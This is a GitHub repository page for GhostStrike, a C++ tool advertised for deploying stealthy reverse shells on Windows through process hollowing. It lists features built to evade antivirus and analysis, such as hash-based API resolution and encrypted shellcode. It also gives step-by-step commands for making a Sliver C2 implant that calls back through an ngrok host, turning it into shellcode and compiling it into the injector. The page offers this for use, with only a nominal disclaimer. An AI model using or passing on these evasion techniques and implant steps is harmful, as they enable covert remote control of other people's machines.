Skip to content

Deploy stealthy reverse shells using advanced process hollowing with GhostStrike – a C++ tool for ethical hacking and Red Team operations.

License

Notifications You must be signed in to change notification settings

wisarutnfst/GhostStrike

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

GhostStrike ⚔️

GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.


✨ Features

  • Dynamic API Resolution: Utilizes a custom hash-based method to dynamically resolve Windows APIs, avoiding detection by signature-based security tools.
  • Base64 Encoding/Decoding: Encodes and decodes shellcode to obscure its presence in memory, making it more difficult for static analysis tools to detect.
  • Cryptographic Key Generation: Generates secure cryptographic keys using Windows Cryptography APIs to encrypt and decrypt shellcode, adding an extra layer of protection.
  • XOR Encryption/Decryption: Simple but effective XOR-based encryption to protect the shellcode during its injection process.
  • Control Flow Flattening: Implements control flow flattening to obfuscate the execution path, complicating analysis by both static and dynamic analysis tools.
  • Process Hollowing: Injects encrypted shellcode into a legitimate Windows process, allowing it to execute covertly without raising suspicions.

⚙️ Configuration

You can configure GhostStrike with the following steps:

  1. Create Ngrok Service: ngrok tcp 443
  2. Generate Sliver C2 Implant: generate --mtls x.tcp.ngrok.io --save YourFile.exe
  3. Create Listener: mtls --lhost 0.0.0.0 --lport 443
  4. Convert to .bin: ./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
  5. Convert to C++ Shellcode: xxd -i YourFile.bin > YourFile.h
  6. Import YourFile.h to this code
  7. Compile and enjoy! 🚀

💻 Requirements

  • C++ Compiler: Any modern C++ compiler, such as g++, clang++, or Visual Studio, is sufficient to compile the code.

No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you're ready to go!


⚠️ Disclaimer

This tool is intended solely for educational purposes and for use in controlled environments. Unauthorized use of GhostStrike outside of these settings is strictly prohibited. The author, @Stiven.Hacker, takes no responsibility for any misuse or damage caused by this code.


🎥 Demo

Check out a live demonstration of GhostStrike in action on LinkedIn:

Watch Demo

About

Deploy stealthy reverse shells using advanced process hollowing with GhostStrike – a C++ tool for ethical hacking and Red Team operations.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C++ 100.0%